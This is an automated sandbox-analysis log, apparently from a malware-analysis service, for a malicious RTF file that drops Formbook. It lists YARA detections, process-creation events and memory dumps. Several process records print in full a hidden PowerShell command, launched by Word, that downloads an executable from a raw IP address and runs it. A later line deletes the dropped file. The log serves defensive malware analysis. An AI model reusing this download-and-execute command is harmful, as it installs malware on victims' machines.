          Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2097570171.0000000000310000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
          Source: 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
          Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: docsc[1].exe.0.drStatic PE information: Section: U#j;F_` ZLIB complexity 1.00031723159
          Source: docsc.exe.3.drStatic PE information: Section: U#j;F_` ZLIB complexity 1.00031723159
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@20/17@9/10
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$60a1e9_by_Libranalysis.rtfJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBC4C.tmpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.......................p.......................`I.........v.....................K......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............+..j......................p.............}..v....(.......0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...`.......0................!`.....6.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............+..j......................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.p.............}..v............0................!`.....".......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............+..j....`.................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j....0%`...............p.............}..v............0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............+..j....`.................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j....0%`...............p.............}..v............0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............+..j....`.................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'..........!`.....H.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............+..j......................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j....0%`...............p.............}..v............0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............+..j......................p.............}..v............0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.^.....w..................j....0%`...............p.............}..v....@.......0.......................f.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............+..j......................p.............}..v....x.......0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j....0%`...............p.............}..v............0................!`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................+..j......................p.............}..v....@.......0................"`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.^.....................;/.j......`...............p.............}..v.....F......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....F................p.............}..v....HG......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;/.j......`...............p.............}..v.....M......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....N................p.............}..v.....O......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.4.............}..v.... S......0...............x.`.....$.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....S................p.............}..v....XT......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;/.j......`...............p.............}..v.... [......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....[................p.............}..v....X\......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;/.j......`...............p.............}..v.... c......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....c................p.............}..v....Xd......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........x.`.....H.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....j................p.............}..v.....j......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;/.j......`...............p.............}..v....Pq......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j.....r................p.............}..v.....r......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....v......0...............x.`.....&.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j....Xw................p.............}..v.....w......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;/.j......`...............p.............}..v.....~......0...............................4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j....X.................p.............}..v............0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............x.`.....<.......4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j......................p.............}..v....P.......0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......;/.j......`...............p.............}..v............0...............x.`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................,.j......................p.............}..v............0.................`.............4...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.......................p.......................`I.........v.....................K......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....P.................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...........0................"}.....6.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......................p.............}..v....@.......0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.p.............}..v....P.......0................"}.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j.....&}...............p.............}..v....P.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j......................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j.....&}...............p.............}..v....P.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........."}.....H.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j....8.................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j.....&}...............p.............}..v....x.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j....0.................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.^.....w..................j.....&}...............p.............}..v............0.......................f.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j......................p.............}..v.... .......0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j.....&}...............p.............}..v............0................"}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....h.................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.^.....................@/.j......}...............p.............}..v.....N......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j....pO................p.............}..v.....O......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................@/.j......}...............p.............}..v.....V......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j....8W................p.............}..v.....W......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.4.............}..v.....[......0...............H.}.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j.....\................p.............}..v.....]......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................@/.j......}...............p.............}..v.....c......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j.....d................p.............}..v.....e......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................@/.j......}...............p.............}..v.....k......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j.....l................p.............}..v.....m......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........H.}.....H.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j.....r................p.............}..v....0s......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................@/.j......}...............p.............}..v.....y......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j.....z................p.............}..v....0{......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....H.......0...............H.}.....&.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j......................p.............}..v............0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................@/.j......}...............p.............}..v....H.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j......................p.............}..v............0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............H.}.....<.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j....x.................p.............}..v............0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......@/.j......}...............p.............}..v............0...............H.}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j....@.................p.............}..v............0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\docsc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\docsc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 1c60a1e9_by_Libranalysis.rtfReversingLabs: Detection: 31%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: mscorlib.pdbment.Automation.pdb" source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: docsc.exe, NAPSTAT.EXE
          Source: Binary string: mscorlib.pdbment.Automation.pdbBBo source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
